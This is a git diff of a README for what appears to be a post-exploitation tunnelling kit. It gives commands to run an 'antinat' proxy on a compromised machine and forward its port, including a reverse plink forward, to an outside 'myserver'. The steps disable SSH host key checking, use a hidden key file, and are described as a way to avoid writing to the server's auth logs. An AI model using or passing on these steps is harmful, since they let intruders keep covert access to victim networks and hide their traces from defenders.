diff --git a/Readme.md b/Readme.md index 8a5fefe..8aea6b7 100644 --- a/Readme.md +++ b/Readme.md @@ -38,22 +38,30 @@ ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs. Instead of using with the socks options, upload the provided package and directly forward the `antinat` port. +``` +./antinat -cantinat.xml +ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 0.0.0.0:32768:127.0.0.1:32768 -i /tmp/.keyfile -fNT targetname@myserver + +``` + ## Windows -Upload the package and extract it with 7z.exe. +Upload the package and extract it. -Start the antinat binary, no admin permissions are required: +Start the `antinat` binary, no admin permissions are required: ``` -antinat.exe -a -cantinat.xml +antinat.exe -a -cC:\temp\antinat.xml ``` -Forward the antinat port with plink: +Forward the antinat port with `plink`: ``` -plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver +echo y | plink -ssh -noagent -pw "wrongpassword" targetname@myserver +plink -ssh -noagent -C -T -N -pw "password" -R 0.0.0.0:32768:127.0.0.1:8080 targetname@myserver ``` +Putty natively supports SSH via HTTP and so does plink but it can only work via cli if a preconfigured session already exist. [More info](https://superuser.com/questions/963563/is-it-possible-to-load-putty-connection-information-session-from-file). ## Tips diff --git a/windows/Readme.txt b/windows/Readme.txt deleted file mode 100644 index 10d5970..0000000 --- a/windows/Readme.txt +++ /dev/null @@ -1 +0,0 @@ -TODO corkscrew